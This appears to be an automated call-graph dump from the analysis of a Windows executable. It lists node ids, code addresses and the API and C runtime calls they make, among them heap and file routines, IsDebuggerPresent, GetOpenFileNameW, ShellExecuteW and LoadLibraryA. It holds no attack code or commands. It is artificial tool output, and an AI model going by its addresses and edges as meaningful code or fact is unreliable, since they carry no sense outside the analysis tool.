42247b 89441 417ebb 6 API calls 2 library calls 89431->89441 89433 422507 HeapAlloc 89433->89439 89434 42248b __mtinitlocknum 89434->89420 89439->89433 89439->89434 89442 418407 89439->89442 89449 41a74c 5 API calls 2 library calls 89439->89449 89450 42254e LeaveCriticalSection _doexit 89439->89450 89451 411afc 6 API calls __decode_pointer 89439->89451 89440->89431 89443 41841c 89442->89443 89444 41842f EnterCriticalSection 89442->89444 89452 418344 89443->89452 89444->89439 89446 418422 89446->89444 89480 4117af 67 API calls 3 library calls 89446->89480 89448 41842e 89448->89444 89449->89439 89450->89439 89451->89439 89453 418350 __mtinitlocknum 89452->89453 89454 418360 89453->89454 89455 418378 89453->89455 89481 418252 67 API calls 2 library calls 89454->89481 89458 418386 __mtinitlocknum 89455->89458 89484 416fb6 89455->89484 89457 418365 89482 4180a7 67 API calls 7 library calls 89457->89482 89458->89446 89462 41836c 89483 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 89462->89483 89463 4183a7 89465 418407 __lock 67 API calls 89463->89465 89464 418398 89490 417f23 67 API calls __getptd_noexit 89464->89490 89468 4183ae 89465->89468 89470 4183e2 89468->89470 89471 4183b6 89468->89471 89473 413a88 __mtinitlocknum 67 API calls 89470->89473 89491 4189e6 InitializeCriticalSectionAndSpinCount __mtinitlocknum 89471->89491 89475 4183d3 89473->89475 89474 4183c1 89474->89475 89492 413a88 89474->89492 89506 4183fe LeaveCriticalSection _doexit 89475->89506 89478 4183cd 89505 417f23 67 API calls __getptd_noexit 89478->89505 89480->89448 89481->89457 89482->89462 89487 416fbf 89484->89487 89486 416ff5 89486->89463 89486->89464 89487->89486 89488 416fd6 Sleep 89487->89488 89507 4138ba 89487->89507 89489 416feb 89488->89489 89489->89486 89489->89487 89490->89458 89491->89474 89494 413a94 __mtinitlocknum 89492->89494 89493 413b0d _realloc __mtinitlocknum 89493->89478 89494->89493 89496 418407 __lock 65 API calls 89494->89496 89504 413ad3 89494->89504 89495 413ae8 RtlFreeHeap 89495->89493 89497 413afa 89495->89497 89501 413aab ___sbh_find_block 89496->89501 89536 417f23 67 API calls __getptd_noexit 89497->89536 89499 413aff GetLastError 89499->89493 89500 413ac5 89535 413ade LeaveCriticalSection _doexit 89500->89535 89501->89500 89534 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __cftoe2_l 89501->89534 89504->89493 89504->89495 89505->89475 89506->89458 89508 41396d 89507->89508 89518 4138cc 89507->89518 89532 411afc 6 API calls __decode_pointer 89508->89532 89510 413973 89533 417f23 67 API calls __getptd_noexit 89510->89533 89515 413929 RtlAllocateHeap 89515->89518 89516 4138dd 89516->89518 89525 418252 67 API calls 2 library calls 89516->89525 89526 4180a7 67 API calls 7 library calls 89516->89526 89527 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 89516->89527 89518->89515 89518->89516 89519 413959 89518->89519 89522 41395e 89518->89522 89524 413965 89518->89524 89528 41386b 67 API calls 4 library calls 89518->89528 89529 411afc 6 API calls __decode_pointer 89518->89529 89530 417f23 67 API calls __getptd_noexit 89519->89530 89531 417f23 67 API calls __getptd_noexit 89522->89531 89524->89487 89525->89516 89526->89516 89528->89518 89529->89518 89530->89522 89531->89524 89532->89510 89533->89524 89534->89500 89535->89504 89536->89499 89537->89321 89538->89329 89539->89333 89540->89349 89541->89355 89543 41848c 89542->89543 89544 41696e __encode_pointer 6 API calls 89543->89544 89545 4184a4 89543->89545 89544->89543 89545->89360 89549 4113e5 89546->89549 89548 41142e 89548->89362 89550 4113f1 __mtinitlocknum 89549->89550 89557 41181b 89550->89557 89556 411412 __mtinitlocknum 89556->89548 89558 418407 __lock 67 API calls 89557->89558 89559 4113f6 89558->89559 89560 4112fa 89559->89560 89561 4169e9 __decode_pointer 6 API calls 89560->89561 89562 41130e 89561->89562 89563 4169e9 __decode_pointer 6 API calls 89562->89563 89564 41131e 89563->89564 89576 4113a1 89564->89576 89583 4170e7 68 API calls 6 library calls 89564->89583 89566 41133c 89567 411388 89566->89567 89570 411357 89566->89570 89571 411366 89566->89571 89568 41696e __encode_pointer 6 API calls 89567->89568 89569 411396 89568->89569 89573 41696e __encode_pointer 6 API calls 89569->89573 89584 417047 73 API calls _realloc 89570->89584 89572 411360 89571->89572 89571->89576 89572->89571 89577 41137c 89572->89577 89585 417047 73 API calls _realloc 89572->89585 89573->89576 89580 41141b 89576->89580 89579 41696e __encode_pointer 6 API calls 89577->89579 89578 411376 89578->89576 89578->89577 89579->89567 89586 411824 89580->89586 89583->89566 89584->89572 89585->89578 89589 41832d LeaveCriticalSection 89586->89589 89588 411420 89588->89556 89589->89588 89591 4092c8 ctype 89590->89591 89592 429db0 VariantClear 89591->89592 89593 4092d5 ctype 89591->89593 89592->89593 89593->89367 89638 40eb70 89594->89638 89597->89372 89598->89374 89599->89377 89642 401f80 89600->89642 89602 40d6f1 IsDebuggerPresent 89603 431a9d MessageBoxA 89602->89603 89604 40d6ff 89602->89604 89605 431ab6 89603->89605 89604->89605 89606 40d71f 89604->89606 89735 403e90 75 API calls 3 library calls 89605->89735 89712 40f3b0 89606->89712 89610 40d73a GetFullPathNameW 89732 401440 127 API calls _wcscat 89610->89732 89612 40d77a 89613 40d782 89612->89613 89614 431b09 SetCurrentDirectoryW 89612->89614 89615 40d78b 89613->89615 89736 43604b 6 API calls 89613->89736 89614->89613 89724 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 89615->89724 89618 431b28 89618->89615 89620 431b30 GetModuleFileNameW 89618->89620 89623 431ba4 GetForegroundWindow ShellExecuteW 89620->89623 89624 431b4c 89620->89624 89622 40d795 89632 40d7a8 89622->89632 89733 40e1e0 97 API calls _memset 89622->89733 89625 40d7c7 89623->89625 89737 401b70 89624->89737 89630 40d7d1 SetCurrentDirectoryW 89625->89630 89630->89379 89631 431b66 89744 40d3b0 75 API calls 2 library calls 89631->89744 89632->89625 89734 401000 Shell_NotifyIconW _memset 89632->89734 89635 431b72 GetForegroundWindow ShellExecuteW 89636 431b9f 89635->89636 89636->89625 89637 40eba0 LoadLibraryA GetProcAddress 89637->89375 89639 40d86e 89638->89639 89640 40eb76 LoadLibraryA 89638->89640 89639->89375 89639->89637 89640->89639 89641 40eb87 GetProcAddress 89640->89641 89641->89639 89745 40e680 75 API calls 89642->89745 89644 401f90 89746 402940 75 API calls __write_nolock 89644->89746 89646 401fa2 GetModuleFileNameW 89747 40ff90 89646->89747 89648 401fbd 89759 4107b0 75 API calls 89648->89759 89650 401fd6 89651 401b70 75 API calls 89650->89651 89652 401fe4 89651->89652 89760 4019e0 76 API calls 89652->89760 89654 401ff2 89655 4092c0 VariantClear 89654->89655 89656 402002 89655->89656 89657 401b70 75 API calls 89656->89657 89658 40201c 89657->89658 89761 4019e0 76 API calls 89658->89761 89660 40202c 89661 401b70 75 API calls 89660->89661 89662 40203c 89661->89662 89762 40c3e0 75 API calls 89662->89762 89664 40204d 89763 40c060 89664->89763 89668 40206e 89769 4115d0 79 API calls 3 library calls 89668->89769 89670 40207d 89671 42c174 89670->89671 89672 402088 89670->89672 89780 401a70 75 API calls 89671->89780 89770 4115d0 79 API calls 3 library calls 89672->89770 89675 42c189 89781 401a70 75 API calls 89675->89781 89676 402093 89676->89675 89677 40209e 89676->89677 89771 4115d0 79 API calls 3 library calls 89677->89771 89680 42c1a7 89682 42c1b0 GetModuleFileNameW 89680->89682 89681 4020a9 89681->89682 89683 4020b4 89681->89683 89782 401a70 75 API calls 89682->89782 89772 4115d0 79 API calls 3 library calls 89683->89772 89686 4020bf 89689 402107 89686->89689 89697 42c20a _wcscpy 89686->89697 89773 401a70 75 API calls 89686->89773 89687 42c1e2 89783 40df50 75 API calls 89687->89783 89691 402119 89689->89691 89689->89697 89690 42c1f1 89784 401a70 75 API calls 89690->89784 89694 42c243 89691->89694 89775 40e7e0 76 API calls 89691->89775 89695 4020e5 _wcscpy 89774 401a70 75 API calls 89695->89774 89696 42c201 89696->89697 89785 401a70 75 API calls 89697->89785 89700 402132 89776 40d030 76 API calls 89700->89776 89703 40213e 89704 4092c0 VariantClear 89703->89704 89707 402148 89704->89707 89705 402184 89709 4092c0 VariantClear 89705->89709 89707->89705 89777 40d030 76 API calls 89707->89777 89778 40e640 76 API calls 89707->89778 89779 401a70 75 API calls 89707->89779 89711 402196 ctype 89709->89711 89711->89602 89713 40f3c9 89712->89713 89714 42ccf4 _memset 89712->89714 90461 40ffb0 76 API calls ctype 89713->90461 89717 42cd05 GetOpenFileNameW 89714->89717 89716 40f3d2 90462 410130 SHGetMalloc 89716->90462 89717->89713 89719 40d732 89717->89719 89719->89610 89719->89612 89720 40f3d9 90467 410020 88 API calls __wcsicoll 89720->90467 89722 40f3e7 90468 40f400 89722->90468 89725 42b9d3 89724->89725 89726 41025a LoadImageW RegisterClassExW 89724->89726 90513 443e8f EnumResourceNamesW LoadImageW 89725->90513 90512 4102f0 7 API calls 89726->90512 89729 40d790 89731 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 89729->89731 89730 42b9da 89731->89622 89732->89612 89733->89632 89734->89625 89735->89612 89736->89618 89738 401b76 _wcslen 89737->89738 89739 41171a 75 API calls 89738->89739 89742 401bc5 89738->89742 89740 401bad _realloc 89739->89740 89741 41171a 75 API calls 89740->89741 89741->89742 89743 40d3b0 75 API calls 2 library calls 89742->89743 89743->89631 89744->89635 89745->89644 89746->89646 89786 40f5e0 89747->89786 89750 40ffa6 89750->89648 89752 42b6d8 89753 42b6e6 89752->89753 89842 434fe1 89752->89842 89755 413a88 __mtinitlocknum 67 API calls 89753->89755 89756 42b6f5 89755->89756 89757 434fe1 106 API calls 89756->89757 89758 42b702 89757->89758 89758->89648 89759->89650 89760->89654 89761->89660 89762->89664 89764 41171a 75 API calls 89763->89764 89765 40c088 89764->89765 89766 41171a 75 API calls 89765->89766 89767 402061 89766->89767 89768 401a70 75 API calls 89767->89768 89768->89668 89769->89670 89770->89676 89771->89681 89772->89686 89773->89695 89774->89689 89775->89700 89776->89703 89777->89707 89778->89707 89779->89707 89780->89675 89781->89680 89782->89687 89783->89690 89784->89696 89785->89707 89846 40f580 89786->89846 89788 40f5f8 _strcat ctype 89854 40f6d0 89788->89854 89793 42b2ee 89883 4151b0 89793->89883 89795 40f679 89795->89793 89796 40f681 89795->89796 89870 414e94 89796->89870 89800 40f68b 89800->89750 89805 452574 89800->89805 89802 42b31d 89889 415484 89802->89889 89804 42b33d 89806 41557c _fseek 105 API calls 89805->89806 89807 4525df 89806->89807 90406 4523ce 89807->90406 89810 4525fc 89810->89752 89811 4151b0 __fread_nolock 81 API calls 89812 45261d 89811->89812 89813 4151b0 __fread_nolock 81 API calls 89812->89813 89814 45262e 89813->89814 89815 4151b0 __fread_nolock 81 API calls 89814->89815 89816 452649 89815->89816 89817 4151b0 __fread_nolock 81 API calls 89816->89817 89818 452666 89817->89818 89819 41557c _fseek 105 API calls 89818->89819 89820 452682 89819->89820 89821 4138ba _malloc 67 API calls 89820->89821 89822 45268e 89821->89822 89823 4138ba _malloc 67 API calls 89822->89823 89824 45269b 89823->89824 89825 4151b0 __fread_nolock 81 API calls 89824->89825 89826 4526ac 89825->89826 89827 44afdc GetSystemTimeAsFileTime 89826->89827 89828 4526bf 89827->89828 89829 4526d5 89828->89829 89830 4526fd 89828->89830 89833 413a88 __mtinitlocknum 67 API calls 89829->89833 89831 452704 89830->89831 89832 45275b 89830->89832 90412 44b195 89831->90412 89835 413a88 __mtinitlocknum 67 API calls 89832->89835 89836 4526df 89833->89836 89839 452759 89835->89839 89837 413a88 __mtinitlocknum 67 API calls 89836->89837 89840 4526e8 89837->89840 89838 452753 89841 413a88 __mtinitlocknum 67 API calls 89838->89841 89839->89752 89840->89752 89841->89839 89843 434ff1 89842->89843 89844 434feb 89842->89844 89843->89753 89845 414e94 __fcloseall 106 API calls 89844->89845 89845->89843 89847 429440 89846->89847 89848 40f589 _wcslen 89846->89848 89849 40f58f WideCharToMultiByte 89848->89849 89850 40f5d8 89849->89850 89851 40f5ad 89849->89851 89850->89788 89902 41171a 89851->89902 89855 40f6dd _strlen 89854->89855 89917 40f790 89855->89917 89858 414e06 89937 414d40 89858->89937 89860 40f666 89860->89793 89861 40f450 89860->89861 89865 40f45a _strcat _realloc __write_nolock 89861->89865 89862 4151b0 __fread_nolock 81 API calls 89862->89865 89864 42936d 89866 41557c _fseek 105 API calls 89864->89866 89865->89862 89865->89864 89869 40f531 89865->89869 90020 41557c 89865->90020 89867 429394 89866->89867 89868 4151b0 __fread_nolock 81 API calls 89867->89868 89868->89869 89869->89795 89871 414ea0 __mtinitlocknum 89870->89871 89872 414ed1 89871->89872 89873 414eb4 89871->89873 89876 415965 __lock_file 68 API calls 89872->89876 89879 414ec9 __mtinitlocknum 89872->89879 90159 417f23 67 API calls __getptd_noexit 89873->90159 89875 414eb9 90160 417ebb 6 API calls 2 library calls 89875->90160 89878 414ee9 89876->89878 90143 414e1d 89878->90143 89879->89800 90228 41511a 89883->90228 89885 4151c8 89886 44afdc 89885->89886 90399 4431e0 89886->90399 89888 44affd 89888->89802 89890 415490 __mtinitlocknum 89889->89890 89891 4154bb 89890->89891 89892 41549e 89890->89892 89894 415965 __lock_file 68 API calls 89891->89894 90403 417f23 67 API calls __getptd_noexit 89892->90403 89896 4154c3 89894->89896 89895 4154a3 90404 417ebb 6 API calls 2 library calls 89895->90404 89898 4152e7 __ftell_nolock 71 API calls 89896->89898 89899 4154cf 89898->89899 90405 4154e8 LeaveCriticalSection LeaveCriticalSection _fseek 89899->90405 89901 4154b3 __mtinitlocknum 89901->89804 89904 411724 89902->89904 89903 4138ba _malloc 67 API calls 89903->89904 89904->89903 89905 40f5bb WideCharToMultiByte 89904->89905 89909 411740 std::bad_alloc::bad_alloc 89904->89909 89914 411afc 6 API calls __decode_pointer 89904->89914 89905->89788 89907 411766 89915 4116fd 67 API calls std::exception::exception 89907->89915 89909->89907 89911 411421 __cinit 74 API calls 89909->89911 89910 411770 89916 41805b RaiseException 89910->89916 89911->89907 89913 41177e 89914->89904 89915->89910 89916->89913 89919 40f7ae _memset 89917->89919 89918 42a349 89919->89918 89921 40f628 89919->89921 89922 415258 89919->89922 89921->89858 89923 415285 89922->89923 89924 415268 89922->89924 89923->89924 89925 41528c 89923->89925 89933 417f23 67 API calls __getptd_noexit 89924->89933 89935 41c551 103 API calls 15 library calls 89925->89935 89928 41526d 89934 417ebb 6 API calls 2 library calls 89928->89934 89929 4152b2 89931 41527d 89929->89931 89936 4191c9 101 API calls 6 library calls 89929->89936 89931->89919 89933->89928 89935->89929 89936->89931 89940 414d4c __mtinitlocknum 89937->89940 89938 414d5f 89989 417f23 67 API calls __getptd_noexit 89938->89989 89940->89938 89942 414d95 89940->89942 89941 414d64 89990 417ebb 6 API calls 2 library calls 89941->89990 89956 41e28c 89942->89956 89945 414d9a 89946 414da1 89945->89946 89947 414dae 89945->89947 89991 417f23 67 API calls __getptd_noexit 89946->89991 89949 414dd6 89947->89949 89950 414db6 89947->89950 89974 41dfd8 89949->89974 89992 417f23 67 API calls __getptd_noexit 89950->89992 89953 414d74 __mtinitlocknum @_EH4_CallFilterFunc@8 89953->89860 89957 41e298 __mtinitlocknum 89956->89957 89958 418407 __lock 67 API calls 89957->89958 89959 41e2a6 89958->89959 89960 41e322 89959->89960 89966 418344 __mtinitlocknum 67 API calls 89959->89966 89971 41e31b 89959->89971 89997 4159a6 68 API calls __lock 89959->89997 89998 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 89959->89998 89962 416fb6 __malloc_crt 67 API calls 89960->89962 89964 41e32c 89962->89964 89963 41e3b0 __mtinitlocknum 89963->89945 89964->89971 89999 4189e6 InitializeCriticalSectionAndSpinCount __mtinitlocknum 89964->89999 89966->89959 89968 41e351 89969 41e35c 89968->89969 89970 41e36f EnterCriticalSection 89968->89970 89972 413a88 __mtinitlocknum 67 API calls 89969->89972 89970->89971 89994 41e3bb 89971->89994 89972->89971 89983 41dffb __wopenfile 89974->89983 89975 41e015 90004 417f23 67 API calls __getptd_noexit 89975->90004 89976 41e1e9 89976->89975 89979 41e247 89976->89979 89978 41e01a 90005 417ebb 6 API calls 2 library calls 89978->90005 90001 425db0 89979->90001 89983->89975 89983->89976 90006 4136bc 79 API calls 3 library calls 89983->90006 89985 41e1e2 89985->89976 90007 4136bc 79 API calls 3 library calls 89985->90007 89987 41e201 89987->89976 90008 4136bc 79 API calls 3 library calls 89987->90008 89989->89941 89991->89953 89992->89953 89993 414dfc LeaveCriticalSection LeaveCriticalSection _fseek 89993->89953 90000 41832d LeaveCriticalSection 89994->90000 89996 41e3c2 89996->89963 89997->89959 89998->89959 89999->89968 90000->89996 90009 425ce4 90001->90009 90003 414de1 90003->89993 90004->89978 90006->89985 90007->89987 90008->89976 90012 425cf0 __mtinitlocknum 90009->90012 90010 425d03 90011 417f23 __free_osfhnd 67 API calls 90010->90011 90013 425d08 90011->90013 90012->90010 90014 425d41 90012->90014 90015 417ebb __strnicmp_l 6 API calls 90013->90015 90016 4255c4 __tsopen_nolock 132 API calls 90014->90016 90019 425d17 __mtinitlocknum 90015->90019 90017 425d5b 90016->90017 90018 425d82 __sopen_helper LeaveCriticalSection 90017->90018 90018->90019 90019->90003 90023 415588 __mtinitlocknum 90020->90023 90021 415596 90051 417f23 67 API calls __getptd_noexit 90021->90051 90022 4155c4 90033 415965 90022->90033 90023->90021 90023->90022 90026 41559b 90052 417ebb 6 API calls 2 library calls 90026->90052 90032 4155ab __mtinitlocknum 90032->89865 90034 415977 90033->90034 90035 415999 EnterCriticalSection 90033->90035 90034->90035 90036 41597f 90034->90036 90037 4155cc 90035->90037 90038 418407 __lock 67 API calls 90036->90038 90039 4154f2 90037->90039 90038->90037 90040 415512 90039->90040 90041 415502 90039->90041 90043 415524 90040->90043 90054 4152e7 90040->90054 90108 417f23 67 API calls __getptd_noexit 90041->90108 90071 41486c 90043->90071 90045 415507 90053 4155f7 LeaveCriticalSection LeaveCriticalSection _fseek 90045->90053 90051->90026 90053->90032 90055 41531a 90054->90055 90056 4152fa 90054->90056 90058 41453a __fileno 67 API calls 90055->90058 90109 417f23 67 API calls __getptd_noexit 90056->90109 90060 415320 90058->90060 90059 4152ff 90110 417ebb 6 API calls 2 library calls 90059->90110 90062 41efd4 __locking 71 API calls 90060->90062 90064 415335 90062->90064 90063 41530f 90063->90043 90064->90063 90065 4153a9 90064->90065 90067 415364 90064->90067 90111 417f23 67 API calls __getptd_noexit 90065->90111 90067->90063 90068 41efd4 __locking 71 API calls 90067->90068 90069 415404 90068->90069 90069->90063 90070 41efd4 __locking 71 API calls 90069->90070 90070->90063 90072 414885 90071->90072 90076 4148a7 90071->90076 90073 41453a __fileno 67 API calls 90072->90073 90072->90076 90074 4148a0 90073->90074 90112 41c3cf 101 API calls 6 library calls 90074->90112 90077 41453a 90076->90077 90078 414549 90077->90078 90082 41455e 90077->90082 90113 417f23 67 API calls __getptd_noexit 90078->90113 90080 41454e 90114 417ebb 6 API calls 2 library calls 90080->90114 90083 41efd4 90082->90083 90084 41efe0 __mtinitlocknum 90083->90084 90085 41f003 90084->90085 90086 41efe8 90084->90086 90088 41f011 90085->90088 90091 41f052 90085->90091 90135 417f36 67 API calls __getptd_noexit 90086->90135 90137 417f36 67 API calls __getptd_noexit 90088->90137 90089 41efed 90136 417f23 67 API calls __getptd_noexit 90089->90136 90115 41ba3b 90091->90115 90093 41f016 90138 417f23 67 API calls __getptd_noexit 90093->90138 90096 41f058 90098 41f065 90096->90098 90099 41f07b 90096->90099 90097 41f01d 90139 417ebb 6 API calls 2 library calls 90097->90139 90125 41ef5f 90098->90125 90140 417f23 67 API calls __getptd_noexit 90099->90140 90101 41eff5 __mtinitlocknum 90101->90045 90104 41f073 90142 41f0a6 LeaveCriticalSection __unlock_fhandle 90104->90142 90105 41f080 90141 417f36 67 API calls __getptd_noexit 90105->90141 90108->90045 90109->90059 90111->90063 90112->90076 90113->90080 90116 41ba47 __mtinitlocknum 90115->90116 90117 41baa2 90116->90117 90120 418407 __lock 67 API calls 90116->90120 90118 41bac4 __mtinitlocknum 90117->90118 90119 41baa7 EnterCriticalSection 90117->90119 90118->90096 90119->90118 90121 41ba73 90120->90121 90122 41ba8a 90121->90122 90124 4189e6 __mtinitlocknum InitializeCriticalSectionAndSpinCount 90121->90124 90123 41bad2 ___lock_fhandle LeaveCriticalSection 90122->90123 90123->90117 90124->90122 90126 41b9c4 __lseek_nolock 67 API calls 90125->90126 90127 41ef6e 90126->90127 90128 41ef84 SetFilePointer 90127->90128 90129 41ef74 90127->90129 90130 41efa3 90128->90130 90131 41ef9b GetLastError 90128->90131 90132 417f23 __free_osfhnd 67 API calls 90129->90132 90133 41ef79 90130->90133 90134 417f49 __dosmaperr 67 API calls 90130->90134 90131->90130 90132->90133 90133->90104 90134->90133 90135->90089 90136->90101 90137->90093 90138->90097 90140->90105 90141->90104 90142->90101 90144 414e31 90143->90144 90145 414e4d 90143->90145 90189 417f23 67 API calls __getptd_noexit 90144->90189 90146 414e46 90145->90146 90149 41486c __flush 101 API calls 90145->90149 90161 414f08 LeaveCriticalSection LeaveCriticalSection _fseek 90146->90161 90148 414e36 90190 417ebb 6 API calls 2 library calls 90148->90190 90151 414e59 90149->90151 90162 41e680 90151->90162 90154 41453a __fileno 67 API calls 90155 414e67 90154->90155 90166 41e5b3 90155->90166 90157 414e6d 90157->90146 90158 413a88 __mtinitlocknum 67 API calls 90157->90158 90158->90146 90159->89875 90161->89879 90163 41e690 90162->90163 90164 414e61 90162->90164 90163->90164 90165 413a88 __mtinitlocknum 67 API calls 90163->90165 90164->90154 90165->90164 90167 41e5bf __mtinitlocknum 90166->90167 90168 41e5e2 90167->90168 90169 41e5c7 90167->90169 90171 41e5f0 90168->90171 90174 41e631 90168->90174 90206 417f36 67 API calls __getptd_noexit 90169->90206 90208 417f36 67 API calls __getptd_noexit 90171->90208 90172 41e5cc 90207 417f23 67 API calls __getptd_noexit 90172->90207 90177 41ba3b ___lock_fhandle 68 API calls 90174->90177 90176 41e5f5 90209 417f23 67 API calls __getptd_noexit 90176->90209 90180 41e637 90177->90180 90178 41e5d4 __mtinitlocknum 90178->90157 90182 41e652 90180->90182 90183 41e644 90180->90183 90181 41e5fc 90210 417ebb 6 API calls 2 library calls 90181->90210 90211 417f23 67 API calls __getptd_noexit 90182->90211 90191 41e517 90183->90191 90187 41e64c 90212 41e676 LeaveCriticalSection __unlock_fhandle 90187->90212 90189->90148 90213 41b9c4 90191->90213 90193 41e57d 90226 41b93e 68 API calls __free_osfhnd 90193->90226 90195 41e527 90195->90193 90198 41b9c4 __lseek_nolock 67 API calls 90195->90198 90205 41e55b 90195->90205 90196 41b9c4 __lseek_nolock 67 API calls 90199 41e567 CloseHandle 90196->90199 90197 41e585 90200 41e5a7 90197->90200 90227 417f49 67 API calls 2 library calls 90197->90227 90201 41e552 90198->90201 90199->90193 90203 41e573 GetLastError 90199->90203 90200->90187 90202 41b9c4 __lseek_nolock 67 API calls 90201->90202 90202->90205 90203->90193 90205->90193 90205->90196 90206->90172 90207->90178 90208->90176 90209->90181 90211->90187 90212->90178 90214 41b9d1 90213->90214 90215 41b9e9 90213->90215 90216 417f36 __free_osfhnd 67 API calls 90214->90216 90217 417f36 __free_osfhnd 67 API calls 90215->90217 90219 41ba2e 90215->90219 90218 41b9d6 90216->90218 90220 41ba17 90217->90220 90221 417f23 __free_osfhnd 67 API calls 90218->90221 90219->90195 90223 417f23 __free_osfhnd 67 API calls 90220->90223 90222 41b9de 90221->90222 90222->90195 90224 41ba1e 90223->90224 90225 417ebb __strnicmp_l 6 API calls 90224->90225 90225->90219 90226->90197 90227->90200 90229 415126 __mtinitlocknum 90228->90229 90230 41516f 90229->90230 90231 415164 __mtinitlocknum 90229->90231 90237 41513a _memset 90229->90237 90232 415965 __lock_file 68 API calls 90230->90232 90231->89885 90234 415177 90232->90234 90241 414f10 90234->90241 90235 415154 90258 417ebb 6 API calls 2 library calls 90235->90258 90257 417f23 67 API calls __getptd_noexit 90237->90257 90242 414f4c 90241->90242 90245 414f2e _memset 90241->90245 90259 4151a6 LeaveCriticalSection LeaveCriticalSection _fseek 90242->90259 90243 414f37 90310 417f23 67 API calls __getptd_noexit 90243->90310 90245->90242 90245->90243 90248 414f8b 90245->90248 90248->90242 90249 4150a9 _memset 90248->90249 90250 41453a __fileno 67 API calls 90248->90250 90256 4150d5 _memset 90248->90256 90260 41ed9e 90248->90260 90290 41e6b1 90248->90290 90312 41ee9b 67 API calls 4 library calls 90248->90312 90313 417f23 67 API calls __getptd_noexit 90249->90313 90250->90248 90255 414f3c 90311 417ebb 6 API calls 2 library calls 90255->90311 90314 417f23 67 API calls __getptd_noexit 90256->90314 90257->90235 90259->90231 90261 41edaa __mtinitlocknum 90260->90261 90262 41edb2 90261->90262 90263 41edcd 90261->90263 90384 417f36 67 API calls __getptd_noexit 90262->90384 90265 41eddb 90263->90265 90268 41ee1c 90263->90268 90386 417f36 67 API calls __getptd_noexit 90265->90386 90266 41edb7 90385 417f23 67 API calls __getptd_noexit 90266->90385 90271 41ee29 90268->90271 90272 41ee3d 90268->90272 90270 41ede0 90387 417f23 67 API calls __getptd_noexit 90270->90387 90389 417f36 67 API calls __getptd_noexit 90271->90389 90275 41ba3b ___lock_fhandle 68 API calls 90272->90275 90278 41ee43 90275->90278 90276 41ede7 90388 417ebb 6 API calls 2 library calls 90276->90388 90277 41ee2e 90390 417f23 67 API calls __getptd_noexit 90277->90390 90282 41ee50 90278->90282 90283 41ee66 90278->90283 90281 41edbf __mtinitlocknum 90281->90248 90315 41e7dc 90282->90315 90391 417f23 67 API calls __getptd_noexit 90283->90391 90286 41ee6b 90392 417f36 67 API calls __getptd_noexit 90286->90392 90287 41ee5e 90393 41ee91 LeaveCriticalSection __unlock_fhandle 90287->90393 90291 41e6c1 90290->90291 90294 41e6de 90290->90294 90397 417f23 67 API calls __getptd_noexit 90291->90397 90293 41e6c6 90398 417ebb 6 API calls 2 library calls 90293->90398 90296 41e713 90294->90296 90303 41e6d6 90294->90303 90394 423600 90294->90394 90298 41453a __fileno 67 API calls 90296->90298 90299 41e727 90298->90299 90300 41ed9e __read 79 API calls 90299->90300 90301 41e72e 90300->90301 90302 41453a __fileno 67 API calls 90301->90302 90301->90303 90304 41e751 90302->90304 90303->90248 90304->90303 90305 41453a __fileno 67 API calls 90304->90305 90306 41e75d 90305->90306 90306->90303 90307 41453a __fileno 67 API calls 90306->90307 90308 41e769 90307->90308 90309 41453a __fileno 67 API calls 90308->90309 90309->90303 90310->90255 90312->90248 90313->90255 90314->90255 90316 41e813 90315->90316 90317 41e7f8 90315->90317 90319 41e822 90316->90319 90321 41e849 90316->90321 90318 417f36 __free_osfhnd 67 API calls 90317->90318 90320 41e7fd 90318->90320 90322 417f36 __free_osfhnd 67 API calls 90319->90322 90324 417f23 __free_osfhnd 67 API calls 90320->90324 90323 41e868 90321->90323 90337 41e87c 90321->90337 90325 41e827 90322->90325 90326 417f36 __free_osfhnd 67 API calls 90323->90326 90338 41e805 90324->90338 90328 417f23 __free_osfhnd 67 API calls 90325->90328 90330 41e86d 90326->90330 90327 41e8d4 90329 417f36 __free_osfhnd 67 API calls 90327->90329 90331 41e82e 90328->90331 90332 41e8d9 90329->90332 90333 417f23 __free_osfhnd 67 API calls 90330->90333 90334 417ebb __strnicmp_l 6 API calls 90331->90334 90335 417f23 __free_osfhnd 67 API calls 90332->90335 90336 41e874 90333->90336 90334->90338 90335->90336 90340 417ebb __strnicmp_l 6 API calls 90336->90340 90337->90327 90337->90338 90339 41e8b0 90337->90339 90341 41e8f5 90337->90341 90338->90287 90339->90327 90346 41e8bb ReadFile 90339->90346 90340->90338 90343 416fb6 __malloc_crt 67 API calls 90341->90343 90347 41e90b 90343->90347 90344 41ed62 GetLastError 90348 41ebe8 90344->90348 90349 41ed6f 90344->90349 90345 41e9e7 90345->90344 90352 41e9fb 90345->90352 90346->90344 90346->90345 90350 41e931 90347->90350 90351 41e913 90347->90351 90358 417f49 __dosmaperr 67 API calls 90348->90358 90381 41eb6d 90348->90381 90354 417f23 __free_osfhnd 67 API calls 90349->90354 90353 423462 __lseeki64_nolock 69 API calls 90350->90353 90355 417f23 __free_osfhnd 67 API calls 90351->90355 90368 41ec2d 90352->90368 90370 41ea17 90352->90370 90352->90381 90356 41e93d 90353->90356 90357 41ed74 90354->90357 90359 41e918 90355->90359 90356->90346 90360 417f36 __free_osfhnd 67 API calls 90357->90360 90358->90381 90361 417f36 __free_osfhnd 67 API calls 90359->90361 90360->90381 90361->90338 90362 413a88 __mtinitlocknum 67 API calls 90362->90338 90363 41eca5 ReadFile 90366 41ecc4 GetLastError 90363->90366 90375 41ecce 90363->90375 90364 41ea7d ReadFile 90365 41ea9b GetLastError 90364->90365 90374 41eaa5 90364->90374 90365->90370 90365->90374 90366->90368 90366->90375 90367 41ebbe MultiByteToWideChar 90369 41ebe2 GetLastError 90367->90369 90367->90381 90368->90363 90368->90381 90369->90348 90370->90364 90371 41eafa 90370->90371 90372 41eb75 90371->90372 90373 41eb68 90371->90373 90377 41eb32 90371->90377 90371->90381 90372->90377 90378 41ebac 90372->90378 90376 417f23 __free_osfhnd 67 API calls 90373->90376 90374->90370 90379 423462 __lseeki64_nolock 69 API calls 90374->90379 90375->90368 90380 423462 __lseeki64_nolock 69 API calls 90375->90380 90376->90381 90377->90367 90382 423462 __lseeki64_nolock 69 API calls 90378->90382 90379->90374 90380->90375 90381->90338 90381->90362 90383 41ebbb 90382->90383 90383->90367 90384->90266 90385->90281 90386->90270 90387->90276 90389->90277 90390->90276 90391->90286 90392->90287 90393->90281 90395 416fb6 __malloc_crt 67 